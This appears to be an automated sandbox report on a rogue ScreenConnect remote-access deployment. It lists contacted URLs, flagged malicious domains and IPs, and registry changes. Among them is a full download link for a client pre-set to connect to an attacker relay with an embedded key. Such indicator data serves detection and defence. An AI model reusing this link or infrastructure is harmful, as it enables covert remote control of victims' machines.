https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
unknown
https://t0.ssl.ak.dynamic.tiles.virt
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManagp
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configt
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config-U
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationx
unknown
https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=
37.221.67.19
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationw
unknown
https://dev.virtualearth.net/REST/v1/Routes/
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientSe
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applications
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
unknown
http://www.w3.or
unknown
http://crl.ver)
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationZ
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
unknown
https://t0.ssl.ak.dynamic.tiles.virtuX
unknown
https://dev.virtualearth.net/REST/v1/Locations
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application089a7
unknown
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
unknown
http://www.carterandcone.coml
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstage
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Windows.dll63:
unknown
http://www.fontbureau.com/designers/frere-jones.html
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationK
unknown
https://dynamic.t
unknown
https://g.live.com/odclientsettings/Prod-C:
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe
37.221.67.19
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationX
unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationuLXGWokl
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.manifest
37.221.67.19
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationre=msila
unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application1
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.dll
37.221.67.19
http://www.fontbureau.com/designersG
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Clie
unknown
http://www.fontbureau.com/designers/?
unknown
http://www.founder.com.cn/cn/bThe
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application8
unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
unknown
http://www.fontbureau.com/designers?
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application2
unknown
http://www.tiro.com
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wih
unknown
http://www.goodfont.co.kr
unknown
http://schemas.micro
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Core.dll
37.221.67.19
https://dev.ditu.live.com/mapcontrol/logging.ashx
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
37.221.67.19
http://www.typography.netD
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
unknown
http://www.galapagosdesign.com/staff/dennis.htm
unknown
http://www.xrml.org/schema/2001/11/xrml2coreS
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe
37.221.67.19
http://www.w3.o
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exx
unknown
http://www.fonts.com
unknown
http://www.sandoll.co.kr
unknown
http://www.sakkal.com
unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://www.fontbureau.com
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.configg
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.exe_
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back
unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/
unknown
http://www.xrml.org/schema/2001/11/xrml2core
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wi
unknown
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cp9856.chelokipotlester.icu
37.221.67.19
 malicious
bg.microsoft.map.fastly.net
199.232.210.172
www.google.com
142.250.185.228
cp3back96.site
37.221.67.19
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
37.221.67.19
cp3back96.site
Russian Federation
malicious
142.250.185.228
www.google.com
United States
192.168.2.16
unknown
unknown
239.255.255.250
unknown
Reserved
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
cval
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Security
c688cf83-9945-5ff6-0e1e-1ff1f8a2ec9a
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
StateStore_RandomString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
{c989bb7a-8385-4715-98cf-a741a8edb823}!ApplicationTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
lock!010000003d485a0b0c1e00003c1e00000000000000000000d0cdac5cde2bdb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ApplicationSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsFullTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsShellVisible
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PreviousBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ExcludedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentProviderUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!MinimumRequiredVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!LastCheckTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkippedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkipTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!AppType
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!CurrentBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
SizeOfStronglyNamedComponent
